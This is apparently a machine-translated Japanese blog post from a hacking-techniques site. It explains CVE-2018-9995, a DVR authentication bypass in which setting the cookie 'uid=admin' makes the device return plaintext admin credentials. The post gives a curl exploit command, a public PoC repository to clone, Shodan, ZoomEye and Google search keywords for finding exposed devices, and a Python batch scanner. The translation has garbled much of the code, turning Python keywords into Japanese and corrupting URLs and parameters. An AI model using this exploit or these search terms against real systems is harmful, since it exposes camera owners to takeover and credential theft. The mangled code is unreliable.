Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863567247

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

###脆弱性の説明

この脆弱性により、攻撃者は「Cookie: uid=admin」を変更して、このデバイスのplantext管理者資格情報を返すことにより、特定のDVRのコントロールパネルにアクセスできます。

###脆弱性の悪用

1.Uuse code

Curl 'http://:/device.rsp?opt=usercmd=list' -h 'cookie: uid=admin'

2.POC利用

https://github.com/ezelf/cve-2018-9995_dvr_credentials

git clone https://github.com/ezelf/cve-2018-9995_dvr_credentials.git

CD CVE-2018-9995_DVR_CREDENTIALS

PIPインストール-R要件。txt

byjuhurtit39022.png

roreffqxbmf9023.png

###キーワード検索

1。Zoomye:KeyWord: "/login.rsp '

ml23vf2ib5y9024.png

2.Shodan:KeyWord:HTML: '/login.rsp'

keyword:'server:gnu rsp/1.0 '

iekdogs3dqm9025.png

vuig5usnmr19026.png

3.GOOGLE:KEYWORD:INTITLE:'DVR LOGIN '

azoq1zh50af9027.png

###バッチ検証

DVRシリーズカメラバッチ検出方法3:python CVE-2018-9995_Check.py HOST.TXT

host.txtの内容は、8.8.8.8:8080またはwww.baidu.comです。スクリプトが実行されると、DVRシリーズカメラを使用してホストがresult.txtファイルに保存されます。

#著者3360hzkey

TPとしてテーブルプリントをインポートします

sysをインポートします

リクエストをインポートします

Reをインポートします

クラスColors:

green='\ 033 [32m'

red='\ 033 [0; 31m'

blue='\ 033 [*]'

orange='\ 033 [33m'

def check_host(host):

try:

print(colors.orange+'チェック:%s'%ホスト)

url='http://' + host + '/login.rsp'

rr=requests.get(url、timeout=30、aopt_redirects=false)

rr.status_code==200およびre.findall( 'gnu rsp/1.0'、rr.headers ['server']):の場合

print(Colors.Green+'[*] CVE-2018-9995検出:URLは%S'%URLです)

ff=open( 'result.txt'、 'a+')

ff.write( '%s \ n'%(url))

:を除く

合格

__name__=='__main __' :の場合

Len(Sys.Argv)2:の場合

print(colors.blue+'' 'usage: python3 cve-2018-9995.py host.txt

host.txt:127.0.0.133608080またはbaidu.com

'' ')

Len(Sys.Argv)=2:の場合

file=open(sys.argv [1])

file:のiの場合

i=i.strip()

check_host(i)

file.close()

tnopgm1udzc9028.png